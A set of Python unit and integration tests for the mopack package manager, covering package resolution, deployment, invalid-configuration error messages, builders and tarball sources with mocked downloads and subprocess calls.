self.assertExists('mopack/src/hello/hello-bfg/build.bfg')
self.assertExists('mopack/build/hello/')
self.assertExists('mopack/logs/hello.log')
self.assertExists('mopack/mopack.json')
self.assertPkgConfigUsage('hello')
output = json.loads(slurp('mopack/mopack.json'))
self.assertEqual(output['metadata'], {
'options': cfg_options(
common={'deploy_paths': {'prefix': self.prefix}}
),
'packages': [
cfg_tarball_pkg(
'hello', config,
path={'base': 'cfgdir', 'path': 'hello-bfg.tar.gz'},
guessed_srcdir='hello-bfg',
builder=cfg_custom_builder(
'hello',
build_commands=[
['bfg9000', 'configure',
{'base': 'builddir', 'path': ''},
['--prefix=', {'base': 'absolute',
'path': self.prefix}]],
['cd', [{'base': 'builddir', 'path': ''}, '/.']],
['ninja'],
],
deploy_commands=[
['ninja', 'install'],
],
usage=cfg_pkg_config_usage(pcfile='hello')
)
),
],
})
self.assertPopen(['mopack', '--debug', 'deploy'])
include_prefix = '' if platform_name() == 'windows' else 'include/'
lib_prefix = '' if platform_name() == 'windows' else 'lib/'
with pushd(self.prefix):
self.assertExists(include_prefix + 'hello.hpp')
self.assertExists(lib_prefix + 'pkgconfig/hello.pc')
```
#### File: test/integration/test_invalid.py
```python
import os
from . import *
class TestInvalid(IntegrationTest):
name = 'invalid'
def test_resolve(self):
config = os.path.join(test_data_dir, 'mopack-invalid.yml')
output = self.assertPopen(['mopack', 'resolve', config], returncode=1)
self.assertRegex(output,
r'error: expected an inner path\n' +
r' in ".+mopack-invalid.yml", line 5, column 13\n' +
r' srcdir: \.\./foo\n' +
r' \^\n$')
class TestInvalidChild(IntegrationTest):
name = 'invalid-child'
def test_resolve(self):
config = os.path.join(test_data_dir, 'mopack-invalid-child.yml')
output = self.assertPopen(['mopack', 'resolve', config], returncode=1)
self.assertRegex(output,
r'error: bfg9000 got an unexpected keyword ' +
r"argument 'unknown'\n" +
r' in ".+mopack.yml", line 4, column 5\n' +
r' unknown: blah\n' +
r' \^\n$')
class TestInvalidParent(IntegrationTest):
name = 'invalid-parent'
def test_resolve(self):
config = os.path.join(test_data_dir, 'mopack-invalid-parent.yml')
output = self.assertPopen(['mopack', 'resolve', config], returncode=1)
self.assertRegex(output,
r"error: unknown usage 'unknown'\n" +
r' in ".+mopack-invalid-parent.yml", ' +
r'line 6, column 13\n' +
r' type: unknown\n' +
r' \^\n$')
class TestInvalidConditional(IntegrationTest):
name = 'invalid-conditional'
def test_resolve(self):
config = os.path.join(test_data_dir, 'mopack-invalid-conditional.yml')
output = self.assertPopen(['mopack', 'resolve', config], returncode=1)
self.assertRegex(output,
r"error: undefined symbol 'unknown'\n" +
r' in ".+mopack-invalid-conditional.yml", ' +
r'line 3, column 11\n' +
r' - if: unknown\n' +
r' \^\n$')
class TestInvalidListFiles(IntegrationTest):
name = 'invalid-list-files'
def test_list_files(self):
self.assertOutput(['mopack', 'list-files'], '')
self.assertPopen(['mopack', 'list-files', '--strict'], returncode=1)
```
#### File: test/integration/test_nested.py
```python
import json
import os
import sys
from textwrap import dedent
from mopack.path import pushd
from mopack.platforms import platform_name
from . import *
class TestNested(IntegrationTest):
name = 'nested'
deploy = True
def setUp(self):
super().setUp()
try:
'┼'.encode(sys.stdout.encoding)
self.supports_unicode = True
except UnicodeEncodeError:
self.supports_unicode = False
def test_resolve(self):
config = os.path.join(test_data_dir, 'mopack-nested.yml')
self.assertPopen(['mopack', 'resolve', config,
'-Pprefix=' + self.prefix])
self.assertExists('mopack/build/greeter/')
self.assertExists('mopack/logs/greeter.log')
self.assertExists('mopack/src/hello/hello-bfg/')
self.assertExists('mopack/build/hello/')
self.assertExists('mopack/logs/hello.log')
self.assertExists('mopack/mopack.json')
self.assertPkgConfigUsage('greeter')
self.assertPkgConfigUsage('hello')
output = json.loads(slurp('mopack/mopack.json'))
self.assertEqual(output['metadata'], {
'options': cfg_options(
common={'deploy_paths': {'prefix': self.prefix}},
bfg9000={}
),
'packages': [
cfg_tarball_pkg(
'hello',
os.path.join(test_data_dir, 'greeter-bfg', 'mopack.yml'),
parent='greeter',
path={'base': 'cfgdir',
'path': os.path.join('..', 'hello-bfg.tar.gz')},
guessed_srcdir='hello-bfg',
builder=cfg_bfg9000_builder('hello')
),
cfg_directory_pkg(
'greeter', config,
path={'base': 'cfgdir', 'path': 'greeter-bfg'},
builder=cfg_bfg9000_builder('greeter')
)
],
})
self.assertPopen(['mopack', 'deploy'])
include_prefix = '' if platform_name() == 'windows' else 'include/'
lib_prefix = '' if platform_name() == 'windows' else 'lib/'
with pushd(self.prefix):
self.assertExists(include_prefix + 'greeter.hpp')
self.assertExists(lib_prefix + 'pkgconfig/greeter.pc')
self.assertExists(include_prefix + 'hello.hpp')
self.assertExists(lib_prefix + 'pkgconfig/hello.pc')
if self.supports_unicode:
self.assertOutput(['mopack', 'list-packages'], dedent("""\
└─ greeter 1.0 (directory)
└─ hello 1.0 (tarball)
"""))
else:
self.assertOutput(['mopack', 'list-packages'], dedent("""\
+- greeter 1.0 (directory)
+- hello 1.0 (tarball)
"""))
self.assertOutput(['mopack', 'list-packages', '--flat'],
'hello 1.0 (tarball)\ngreeter 1.0 (directory)\n')
def test_resolve_extra(self):
config = os.path.join(test_data_dir, 'mopack-nested-extra.yml')
self.assertPopen(['mopack', 'resolve', config,
'-Pprefix=' + self.prefix])
self.assertExists('mopack/build/greeter/')
self.assertExists('mopack/logs/greeter.log')
self.assertNotExists('mopack/src/hello/hello-bfg/')
self.assertExists('mopack/build/hello/')
self.assertExists('mopack/logs/hello.log')
self.assertExists('mopack/mopack.json')
self.assertPkgConfigUsage('greeter')
self.assertPkgConfigUsage('hello')
output = json.loads(slurp('mopack/mopack.json'))
self.assertEqual(output['metadata'], {
'options': cfg_options(
common={'deploy_paths': {'prefix': self.prefix}},
bfg9000={}
),
'packages': [
cfg_directory_pkg(
'hello', config,
path={'base': 'cfgdir', 'path': 'hello-bfg'},
builder=cfg_bfg9000_builder(
'hello', extra_args=['--extra']
)
),
cfg_directory_pkg(
'greeter', config,
path={'base': 'cfgdir', 'path': 'greeter-bfg'},
builder=cfg_bfg9000_builder(
'greeter', extra_args=['--extra']
)
)
],
})
self.assertPopen(['mopack', 'deploy'])
include_prefix = '' if platform_name() == 'windows' else 'include/'
lib_prefix = '' if platform_name() == 'windows' else 'lib/'
with pushd(self.prefix):
self.assertExists(include_prefix + 'greeter.hpp')
self.assertExists(lib_prefix + 'pkgconfig/greeter.pc')
self.assertExists(include_prefix + 'hello.hpp')
self.assertExists(lib_prefix + 'pkgconfig/hello.pc')
if self.supports_unicode:
self.assertOutput(['mopack', 'list-packages'], dedent("""\
├─ hello 1.0 (directory)
└─ greeter 1.0 (directory)
"""))
else:
self.assertOutput(['mopack', 'list-packages'], dedent("""\
+- hello 1.0 (directory)
+- greeter 1.0 (directory)
"""))
self.assertOutput(['mopack', 'list-packages', '--flat'],
'hello 1.0 (directory)\ngreeter 1.0 (directory)\n')
```
#### File: unit/builders/test_builders.py
```python
from . import BuilderTest
from mopack.builders import make_builder
from mopack.builders.bfg9000 import Bfg9000Builder
from mopack.types import FieldError
class TestMakeBuilder(BuilderTest):
def test_make(self):
builder = make_builder('foo', {'type': 'bfg9000'}, submodules=None,
_options=self.make_options())
self.assertIsInstance(builder, Bfg9000Builder)
self.assertEqual(builder.name, 'foo')
def test_make_string(self):
builder = make_builder('foo', 'bfg9000', submodules=None,
_options=self.make_options())
self.assertIsInstance(builder, Bfg9000Builder)
self.assertEqual(builder.name, 'foo')
def test_unknown_builder(self):
self.assertRaises(FieldError, make_builder, 'foo', {'type': 'goofy'},
submodules=None, _options=self.make_options())
def test_invalid_keys(self):
self.assertRaises(TypeError, make_builder, 'foo',
{'type': 'bfg9000', 'unknown': 'blah'},
submodules=None, _options=self.make_options())
def test_invalid_values(self):
self.assertRaises(FieldError, make_builder, 'foo',
{'type': 'bfg9000', 'extra_args': 1},
submodules=None, _options=self.make_options())
```
#### File: unit/builders/test_none.py
```python
import os
from unittest import mock
from . import BuilderTest, MockPackage, through_json
from mopack.builders import Builder
from mopack.builders.none import NoneBuilder
from mopack.iterutils import iterate
from mopack.usage.pkg_config import PkgConfigUsage
class TestNoneBuilder(BuilderTest):
builder_type = NoneBuilder
path_bases = ('srcdir',)
def pkgconfdir(self, name, pkgconfig='pkgconfig'):
return os.path.join(self.srcdir, pkgconfig)
def check_build(self, builder, extra_args=[], *, submodules=None,
usage=None):
if usage is None:
pcfiles = ['foo']
pcfiles.extend('foo_{}'.format(i) for i in iterate(submodules))
usage = {'name': 'foo', 'type': 'pkg_config',
'path': [self.pkgconfdir('foo')], 'pcfiles': pcfiles,
'extra_args': []}
with mock.patch('subprocess.run') as mcall:
builder.build(self.pkgdir, self.srcdir)
mcall.assert_not_called()
self.assertEqual(builder.get_usage(
MockPackage(), submodules, self.pkgdir, self.srcdir
), usage)
def test_basic(self):
builder = self.make_builder('foo', usage='pkg_config')
self.assertEqual(builder.name, 'foo')
self.assertEqual(builder.usage, PkgConfigUsage(
'foo', submodules=None, _options=self.make_options(),
_path_bases=self.path_bases
))
self.check_build(builder)
with mock.patch('subprocess.run') as mcall:
builder.deploy(self.pkgdir, self.srcdir)
mcall.assert_not_called()
def test_usage_full(self):
usage = {'type': 'pkg_config', 'path': 'pkgconf'}
builder = self.make_builder('foo', usage=usage)
self.assertEqual(builder.name, 'foo')
self.assertEqual(builder.usage, PkgConfigUsage(
'foo', path='pkgconf', submodules=None,
_options=self.make_options(), _path_bases=self.path_bases
))
self.check_build(builder, usage={
'name': 'foo', 'type': 'pkg_config',
'path': [self.pkgconfdir('foo', 'pkgconf')], 'pcfiles': ['foo'],
'extra_args': [],
})
def test_submodules(self):
submodules_required = {'names': '*', 'required': True}
submodules_optional = {'names': '*', 'required': False}
builder = self.make_builder('foo', usage='pkg_config',
submodules=submodules_required)
self.check_build(builder, submodules=['sub'], usage={
'name': 'foo', 'type': 'pkg_config',
'path': [self.pkgconfdir('foo')], 'pcfiles': ['foo_sub'],
'extra_args': [],
})
builder = self.make_builder(
'foo', usage={'type': 'pkg_config', 'pcfile': 'bar'},
submodules=submodules_required
)
self.check_build(builder, submodules=['sub'], usage={
'name': 'foo', 'type': 'pkg_config',
'path': [self.pkgconfdir('foo')], 'pcfiles': ['bar', 'foo_sub'],
'extra_args': [],
})
builder = self.make_builder('foo', usage='pkg_config',
submodules=submodules_optional)
self.check_build(builder, submodules=['sub'])
builder = self.make_builder(
'foo', usage={'type': 'pkg_config', 'pcfile': 'bar'},
submodules=submodules_optional
)
self.check_build(builder, submodules=['sub'], usage={
'name': 'foo', 'type': 'pkg_config',
'path': [self.pkgconfdir('foo')], 'pcfiles': ['bar', 'foo_sub'],
'extra_args': [],
})
def test_clean(self):
builder = self.make_builder('foo', usage='pkg_config')
with mock.patch('shutil.rmtree') as mrmtree:
builder.clean(self.pkgdir)
mrmtree.assert_not_called()
def test_rehydrate(self):
opts = self.make_options()
builder = NoneBuilder('foo', submodules=None, _options=opts)
builder.set_usage({'type': 'pkg_config', 'path': 'pkgconf'},
submodules=None)
data = through_json(builder.dehydrate())
self.assertEqual(builder, Builder.rehydrate(data, _options=opts))
def test_upgrade(self):
opts = self.make_options()
data = {'type': 'none', '_version': 0, 'name': 'foo',
'usage': {'type': 'system', '_version': 0}}
with mock.patch.object(NoneBuilder, 'upgrade',
side_effect=NoneBuilder.upgrade) as m:
pkg = Builder.rehydrate(data, _options=opts)
self.assertIsInstance(pkg, NoneBuilder)
m.assert_called_once()
```
#### File: unit/sources/__init__.py
```python
from .. import OptionsTest, through_json # noqa: F401
class SourceTest(OptionsTest):
def make_options(self, pkg_type=None, *, common_options=None,
this_options=None, deploy_paths=None, config_file=None):
options = super().make_options(common_options, deploy_paths)
if this_options:
source = (pkg_type or self.pkg_type).source
options.sources[source].accumulate(
this_options, _symbols=options.expr_symbols,
config_file=config_file or self.config_file
)
return options
def make_package(self, *args, common_options=None, this_options=None,
deploy_paths=None, **kwargs):
if len(args) == 1:
pkg_type = self.pkg_type
name = args[0]
else:
pkg_type, name = args
kwargs.setdefault('config_file', self.config_file)
opts = self.make_options(pkg_type, common_options=common_options,
this_options=this_options,
deploy_paths=deploy_paths)
return pkg_type(name, _options=opts, **kwargs)
```
#### File: sources/sdist/test_tarball.py
```python
import os
import subprocess
from unittest import mock
from . import *
from .... import *
from mopack.builders.bfg9000 import Bfg9000Builder
from mopack.config import Config
from mopack.path import Path
from mopack.sources import Package
from mopack.sources.apt import AptPackage
from mopack.sources.sdist import TarballPackage
from mopack.types import ConfigurationError
def mock_exists(p):
return os.path.basename(p) == 'mopack.yml'
class TestTarball(SDistTestCase):
pkg_type = TarballPackage
srcurl = 'http://example.invalid/hello-bfg.tar.gz'
srcpath = os.path.join(test_data_dir, 'hello-bfg.tar.gz')
def setUp(self):
self.config = Config([])
def mock_urlopen(self, url):
return open(self.srcpath, 'rb')
def check_fetch(self, pkg):
srcdir = os.path.join(self.pkgdir, 'src', 'foo')
with mock.patch('mopack.sources.sdist.urlopen', self.mock_urlopen), \
mock.patch('tarfile.TarFile.extractall') as mtar, \
mock.patch('os.path.isdir', return_value=True), \
mock.patch('os.path.exists', return_value=False): # noqa
pkg.fetch(self.config, self.pkgdir)
mtar.assert_called_once_with(srcdir, None)
def test_url(self):
pkg = self.make_package('foo', url=self.srcurl, build='bfg9000')
self.assertEqual(pkg.url, self.srcurl)
self.assertEqual(pkg.path, None)
self.assertEqual(pkg.patch, None)
self.assertEqual(pkg.builder, self.make_builder(Bfg9000Builder, 'foo'))
self.assertEqual(pkg.needs_dependencies, True)
self.assertEqual(pkg.should_deploy, True)
self.check_fetch(pkg)
self.check_resolve(pkg)
def test_path(self):
pkg = self.make_package('foo', path=self.srcpath, build='bfg9000')
self.assertEqual(pkg.url, None)
self.assertEqual(pkg.path, Path(self.srcpath))
self.assertEqual(pkg.patch, None)
self.assertEqual(pkg.builder, self.make_builder(Bfg9000Builder, 'foo'))
self.assertEqual(pkg.needs_dependencies, True)
self.assertEqual(pkg.should_deploy, True)
self.check_fetch(pkg)
self.check_resolve(pkg)
def test_zip_path(self):
srcpath = os.path.join(test_data_dir, 'hello-bfg.zip')
pkg = self.make_package('foo', build='bfg9000', path=srcpath)
self.assertEqual(pkg.url, None)
self.assertEqual(pkg.path, Path(srcpath))
self.assertEqual(pkg.builder, self.make_builder(Bfg9000Builder, 'foo'))
self.assertEqual(pkg.needs_dependencies, True)
self.assertEqual(pkg.should_deploy, True)
srcdir = os.path.join(self.pkgdir, 'src', 'foo')
with mock.patch('mopack.sources.sdist.urlopen', self.mock_urlopen), \
mock.patch('zipfile.ZipFile.extractall') as mtar, \
mock.patch('os.path.isdir', return_value=True), \
mock.patch('os.path.exists', return_value=False): # noqa
pkg.fetch(self.config, self.pkgdir)
mtar.assert_called_once_with(srcdir, None)
self.check_resolve(pkg)
def test_invalid_url_path(self):
with self.assertRaises(TypeError):
self.make_package('foo', build='bfg9000')
with self.assertRaises(TypeError):
self.make_package('foo', url=self.srcurl, path=self.srcpath,
build='bfg9000')
def test_files(self):
pkg = self.make_package('foo', path=self.srcpath,
files='/hello-bfg/include/', build='bfg9000')
self.assertEqual(pkg.files, ['/hello-bfg/include/'])
srcdir = os.path.join(self.pkgdir, 'src', 'foo')
with mock.patch('mopack.sources.sdist.urlopen', self.mock_urlopen), \
mock.patch('tarfile.TarFile.extract') as mtar, \
mock.patch('os.path.isdir', return_value=True), \
mock.patch('os.path.exists', return_value=False): # noqa
pkg.fetch(self.config, self.pkgdir)
self.assertEqual(mtar.mock_calls, [
mock.call('hello-bfg/include', srcdir),
mock.call('hello-bfg/include/hello.hpp', srcdir),
])
self.check_resolve(pkg)
def test_patch(self):
patch = os.path.join(test_data_dir, 'hello-bfg.patch')
pkg = self.make_package('foo', path=self.srcpath, patch=patch,
build='bfg9000')
self.assertEqual(pkg.patch, Path(patch))
srcdir = os.path.join(self.pkgdir, 'src', 'foo')
with mock.patch('mopack.sources.sdist.urlopen', self.mock_urlopen), \
mock.patch('mopack.sources.sdist.pushd'), \
mock.patch('tarfile.TarFile.extractall') as mtar, \
mock.patch('os.path.isdir', return_value=True), \
mock.patch('os.path.exists', return_value=False), \
mock.patch('builtins.open', mock_open_after_first()) as mopen, \
mock.patch('os.makedirs'), \
mock.patch('subprocess.run') as mrun: # noqa
pkg.fetch(self.config, self.pkgdir)
mtar.assert_called_once_with(srcdir, None)
mrun.assert_called_once_with(
['patch', '-p1'], stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, stdin=mopen(),
universal_newlines=True, check=True
)
self.check_resolve(pkg)
def test_build(self):
build = {'type': 'bfg9000', 'extra_args': '--extra'}
pkg = self.make_package('foo', path=self.srcpath, build=build,
usage='pkg_config')
self.assertEqual(pkg.path, Path(self.srcpath))
self.assertEqual(pkg.builder, self.make_builder(
Bfg9000Builder, 'foo', extra_args='--extra'
))
self.check_fetch(pkg)
self.check_resolve(pkg)
def test_infer_build(self):
# Basic inference
pkg = self.make_package('foo', path=self.srcpath)
self.assertEqual(pkg.builder, None)
with mock.patch('os.path.exists', mock_exists), \
mock.patch('builtins.open', mock_open_after_first(
read_data='export:\n build: bfg9000'
)), \
mock.patch('tarfile.TarFile.extractall'): # noqa
config = pkg.fetch(self.config, self.pkgdir)
self.assertEqual(config.export.build, 'bfg9000')
self.assertEqual(pkg, self.make_package(
'foo', path=self.srcpath, build='bfg9000'
))
self.check_resolve(pkg)
# Infer but override usage and version
pkg = self.make_package('foo', path=self.srcpath,
usage={'type': 'system'})
self.assertEqual(pkg.builder, None)
with mock.patch('os.path.exists', mock_exists), \
mock.patch('builtins.open', mock_open_after_first(
read_data='export:\n build: bfg9000'
)), \
mock.patch('tarfile.TarFile.extractall'): # noqa
config = pkg.fetch(self.config, self.pkgdir)
self.assertEqual(config.export.build, 'bfg9000')
self.assertEqual(pkg, self.make_package(
'foo', path=self.srcpath, build='bfg9000',
usage={'type': 'system'}
))
with mock.patch('subprocess.run', side_effect=OSError()), \
mock.patch('mopack.usage.path_system.PathUsage._filter_path',
lambda *args: []), \
mock.patch('mopack.usage.path_system.file_outdated',
return_value=True), \
mock.patch('os.makedirs'), \
mock.patch('builtins.open'): # noqa
self.check_resolve(pkg, usage={
'name': 'foo', 'type': 'system',
'path': [self.pkgconfdir(None)], 'pcfiles': ['foo'],
'generated': True, 'auto_link': False,
})
def test_infer_build_override(self):
pkg = self.make_package('foo', path=self.srcpath, build='cmake',
usage='pkg_config')
with mock.patch('os.path.exists', mock_exists), \
mock.patch('builtins.open', mock_open_after_first(
read_data='export:\n build: bfg9000'
)), \
mock.patch('tarfile.TarFile.extractall'): # noqa
config = pkg.fetch(self.config, self.pkgdir)
self.assertEqual(config.export.build, 'bfg9000')
self.assertEqual(pkg, self.make_package(
'foo', path=self.srcpath, build='cmake', usage='pkg_config'
))
with mock.patch('mopack.builders.cmake.pushd'):
self.check_resolve(pkg)
def test_usage(self):
pkg = self.make_package('foo', path=self.srcpath, build='bfg9000',
usage='pkg_config')
self.assertEqual(pkg.path, Path(self.srcpath))
self.assertEqual(pkg.builder, self.make_builder(
Bfg9000Builder, 'foo', usage='pkg_config'
))
self.check_fetch(pkg)
self.check_resolve(pkg)
with mock.patch('subprocess.run') as mrun:
pkg.version(self.pkgdir)
mrun.assert_called_once_with(
['pkg-config', 'foo', '--modversion'],
check=True, env={'PKG_CONFIG_PATH': self.pkgconfdir('foo')},
stdout=subprocess.PIPE, universal_newlines=True
)
usage = {'type': 'pkg_config', 'path': 'pkgconf'}
pkg = self.make_package('foo', path=self.srcpath, build='bfg9000',
usage=usage)
self.assertEqual(pkg.path, Path(self.srcpath))
self.assertEqual(pkg.builder, self.make_builder(
Bfg9000Builder, 'foo', usage=usage
))
self.check_fetch(pkg)
self.check_resolve(pkg, usage={
'name': 'foo', 'type': 'pkg_config',
'path': [self.pkgconfdir('foo', 'pkgconf')], 'pcfiles': ['foo'],
'extra_args': [],
})
usage = {'type': 'path', 'libraries': []}
pkg = self.make_package('foo', path=self.srcpath, build='bfg9000',
usage=usage)
self.assertEqual(pkg.path, Path(self.srcpath))
self.assertEqual(pkg.builder, self.make_builder(
Bfg9000Builder, 'foo', usage=usage
))
self.check_fetch(pkg)
self.check_resolve(pkg, usage={
'name': 'foo', 'type': 'path', 'path': [self.pkgconfdir(None)],
'pcfiles': ['foo'], 'generated': True, 'auto_link': False,
})
with mock.patch('subprocess.run') as mrun:
self.assertEqual(pkg.version(self.pkgdir), None)
mrun.assert_not_called()
def test_submodules(self):
submodules_required = {'names': '*', 'required': True}
submodules_optional = {'names': '*', 'required': False}
pkg = self.make_package('foo', path=self.srcpath, build='bfg9000',
submodules=submodules_required)
self.check_fetch(pkg)
self.check_resolve(pkg, submodules=['sub'])
pkg = self.make_package('foo', path=self.srcpath, build='bfg9000',
usage={'type': 'pkg_config', 'pcfile': 'bar'},
submodules=submodules_required)
self.check_fetch(pkg)
self.check_resolve(pkg, submodules=['sub'], usage={
'name': 'foo', 'type': 'pkg_config',
'path': [self.pkgconfdir('foo')], 'pcfiles': ['bar', 'foo_sub'],
'extra_args': [],
})
pkg = self.make_package('foo', path=self.srcpath, build='bfg9000',
submodules=submodules_optional)
self.check_fetch(pkg)
self.check_resolve(pkg, submodules=['sub'])
pkg = self.make_package('foo', path=self.srcpath, build='bfg9000',
usage={'type': 'pkg_config', 'pcfile': 'bar'},
submodules=submodules_optional)
self.check_fetch(pkg)
self.check_resolve(pkg, submodules=['sub'], usage={
'name': 'foo', 'type': 'pkg_config',
'path': [self.pkgconfdir('foo')], 'pcfiles': ['bar', 'foo_sub'],
'extra_args': [],
})
def test_invalid_submodule(self):
pkg = self.make_package(
'foo', path=self.srcpath, build='bfg9000',
submodules={'names': ['sub'], 'required': True}
)
with self.assertRaises(ValueError):
pkg.get_usage(self.pkgdir, ['invalid'])
def test_already_fetched(self):
def mock_exists(p):
return os.path.basename(p) == 'foo'
build = {'type': 'bfg9000', 'extra_args': '--extra'}
pkg = self.make_package('foo', path=self.srcpath, srcdir='srcdir',
build=build, usage='pkg_config')
with mock.patch('os.path.exists', mock_exists), \
mock.patch('tarfile.TarFile.extractall') as mtar, \
mock.patch('os.path.isdir', return_value=True): # noqa
pkg.fetch(self.config, self.pkgdir)
mtar.assert_not_called()
self.check_resolve(pkg)
def test_deploy(self):
deploy_paths = {'prefix': '/usr/local'}
pkg = self.make_package('foo', url=self.srcurl, build='bfg9000',
deploy_paths=deploy_paths)
self.assertEqual(pkg.should_deploy, True)
self.check_fetch(pkg)
with mock_open_log() as mopen, \
mock.patch('mopack.builders.bfg9000.pushd'), \
mock.patch('subprocess.run') as mrun: # noqa
pkg.resolve(self.pkgdir)
mopen.assert_called_with(os.path.join(
self.pkgdir, 'logs', 'foo.log'
), 'a')
builddir = os.path.join(self.pkgdir, 'build', 'foo')
mrun.assert_any_call(
['bfg9000', 'configure', builddir, '--prefix', '/usr/local'],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
universal_newlines=True, check=True
)
with mock_open_log() as mopen, \
mock.patch('mopack.builders.bfg9000.pushd'), \
mock.patch('subprocess.run'): # noqa
pkg.deploy(self.pkgdir)
mopen.assert_called_with(os.path.join(
self.pkgdir, 'logs', 'deploy', 'foo.log'
), 'a')
pkg = self.make_package('foo', url='http://example.com',
build='bfg9000', deploy=False)
self.assertEqual(pkg.should_deploy, False)
with mock_open_log() as mopen:
pkg.deploy(self.pkgdir)
mopen.assert_not_called()
def test_clean_pre(self):
otherpath = os.path.join(test_data_dir, 'other_project.tar.gz')
oldpkg = self.make_package('foo', path=self.srcpath,
srcdir='bfg_project', build='bfg9000')
newpkg1 = self.make_package('foo', path=otherpath, build='bfg9000')
newpkg2 = self.make_package(AptPackage, 'foo')
srcdir = os.path.join(self.pkgdir, 'src', 'foo')
# Tarball -> Tarball (same)
with mock.patch('mopack.log.pkg_clean') as mlog, \
mock.patch('shutil.rmtree') as mrmtree: # noqa
self.assertEqual(oldpkg.clean_pre(oldpkg, self.pkgdir), False)
mlog.assert_not_called()
mrmtree.assert_not_called()
# Tarball -> Tarball (different)
with mock.patch('mopack.log.pkg_clean') as mlog, \
mock.patch('shutil.rmtree') as mrmtree: # noqa
self.assertEqual(oldpkg.clean_pre(newpkg1, self.pkgdir), True)
mlog.assert_called_once()
mrmtree.assert_called_once_with(srcdir, ignore_errors=True)
# Tarball -> Apt
with mock.patch('mopack.log.pkg_clean') as mlog, \
mock.patch('shutil.rmtree') as mrmtree: # noqa
self.assertEqual(oldpkg.clean_pre(newpkg2, self.pkgdir), True)
mlog.assert_called_once()
mrmtree.assert_called_once_with(srcdir, ignore_errors=True)
# Tarball -> nothing
with mock.patch('mopack.log.pkg_clean') as mlog, \
mock.patch('shutil.rmtree') as mrmtree: # noqa
self.assertEqual(oldpkg.clean_pre(None, self.pkgdir), True)
mlog.assert_called_once()
mrmtree.assert_called_once_with(srcdir, ignore_errors=True)
# Tarball -> nothing (quiet)
with mock.patch('mopack.log.pkg_clean') as mlog, \
mock.patch('shutil.rmtree') as mrmtree: # noqa
self.assertEqual(oldpkg.clean_pre(None, self.pkgdir, True), True)
mlog.assert_not_called()
mrmtree.assert_called_once_with(srcdir, ignore_errors=True)
def test_clean_post(self):
otherpath = os.path.join(test_data_dir, 'other_project.tar.gz')
oldpkg = self.make_package('foo', path=self.srcpath,
srcdir='bfg_project', build='bfg9000')
newpkg1 = self.make_package('foo', path=otherpath, build='bfg9000')
newpkg2 = self.make_package(AptPackage, 'foo')
# Tarball -> Tarball (same)
with mock.patch('mopack.log.pkg_clean') as mlog, \
mock.patch(mock_bfgclean) as mclean: # noqa
self.assertEqual(oldpkg.clean_post(oldpkg, self.pkgdir), False)
mlog.assert_not_called()
mclean.assert_not_called()
# Tarball -> Tarball (different)
with mock.patch('mopack.log.pkg_clean') as mlog, \
mock.patch(mock_bfgclean) as mclean: # noqa
self.assertEqual(oldpkg.clean_post(newpkg1, self.pkgdir), True)
mlog.assert_called_once()
mclean.assert_called_once_with(self.pkgdir)
# Tarball -> Apt
with mock.patch('mopack.log.pkg_clean') as mlog, \
mock.patch(mock_bfgclean) as mclean: # noqa
self.assertEqual(oldpkg.clean_post(newpkg2, self.pkgdir), True)
mlog.assert_called_once()
mclean.assert_called_once_with(self.pkgdir)
# Tarball -> nothing
with mock.patch('mopack.log.pkg_clean') as mlog, \
mock.patch(mock_bfgclean) as mclean: # noqa
self.assertEqual(oldpkg.clean_post(None, self.pkgdir), True)
mlog.assert_called_once()
mclean.assert_called_once_with(self.pkgdir)
# Tarball -> nothing (quiet)
with mock.patch('mopack.log.pkg_clean') as mlog, \
mock.patch(mock_bfgclean) as mclean: # noqa
self.assertEqual(oldpkg.clean_post(None, self.pkgdir, True), True)
mlog.assert_not_called()
mclean.assert_called_once_with(self.pkgdir)
def test_clean_all(self):
otherpath = os.path.join(test_data_dir, 'other_project.tar.gz')
oldpkg = self.make_package('foo', path=self.srcpath,
srcdir='bfg_project', build='bfg9000')
newpkg1 = self.make_package('foo', path=otherpath, build='bfg9000')
newpkg2 = self.make_package(AptPackage, 'foo')
srcdir = os.path.join(self.pkgdir, 'src', 'foo')
# Tarball -> Tarball (same)
with mock.patch('mopack.log.pkg_clean') as mlog, \
mock.patch(mock_bfgclean) as mclean, \
mock.patch('shutil.rmtree') as mrmtree: # noqa
self.assertEqual(oldpkg.clean_all(oldpkg, self.pkgdir),
(False, False))
mlog.assert_not_called()
mclean.assert_not_called()
mrmtree.assert_not_called()
# Tarball -> Tarball (different)
with mock.patch('mopack.log.pkg_clean') as mlog, \
mock.patch(mock_bfgclean) as mclean, \
mock.patch('shutil.rmtree') as mrmtree: # noqa
self.assertEqual(oldpkg.clean_all(newpkg1, self.pkgdir),
(True, True))
self.assertEqual(mlog.call_count, 2)
mclean.assert_called_once_with(self.pkgdir)
mrmtree.assert_called_once_with(srcdir, ignore_errors=True)
# Tarball -> Apt
with mock.patch('mopack.log.pkg_clean') as mlog, \
mock.patch(mock_bfgclean) as mclean, \
mock.patch('shutil.rmtree') as mrmtree: # noqa
self.assertEqual(oldpkg.clean_all(newpkg2, self.pkgdir),
(True, True))
self.assertEqual(mlog.call_count, 2)
mclean.assert_called_once_with(self.pkgdir)
mrmtree.assert_called_once_with(srcdir, ignore_errors=True)
# Tarball -> nothing
with mock.patch('mopack.log.pkg_clean') as mlog, \
mock.patch(mock_bfgclean) as mclean, \
mock.patch('shutil.rmtree') as mrmtree: # noqa
self.assertEqual(oldpkg.clean_all(None, self.pkgdir),
(True, True))
self.assertEqual(mlog.call_count, 2)
mclean.assert_called_once_with(self.pkgdir)
mrmtree.assert_called_once_with(srcdir, ignore_errors=True)
# Tarball -> nothing (quiet)
with mock.patch('mopack.log.pkg_clean') as mlog, \
mock.patch(mock_bfgclean) as mclean, \
mock.patch('shutil.rmtree') as mrmtree: # noqa
self.assertEqual(oldpkg.clean_all(None, self.pkgdir, True),
(True, True))
mlog.assert_not_called()
mclean.assert_called_once_with(self.pkgdir)
mrmtree.assert_called_once_with(srcdir, ignore_errors=True)
def test_equality(self):
otherpath = os.path.join(test_data_dir, 'other_project.tar.gz')
pkg = self.make_package('foo', path=self.srcpath, build='bfg9000')
self.assertEqual(pkg, self.make_package(
'foo', path=self.srcpath, build='bfg9000'
))
self.assertEqual(pkg, self.make_package(
'foo', path=self.srcpath, build='bfg9000',
config_file='/path/to/mopack2.yml'
))
self.assertNotEqual(pkg, self.make_package(
'bar', path=self.srcpath, build='bfg9000'
))
self.assertNotEqual(pkg, self.make_package(
'foo', url=self.srcurl, build='bfg9000'
))
self.assertNotEqual(pkg, self.make_package(
'foo', path=otherpath, build='bfg9000'
))
def test_rehydrate(self):
opts = self.make_options()
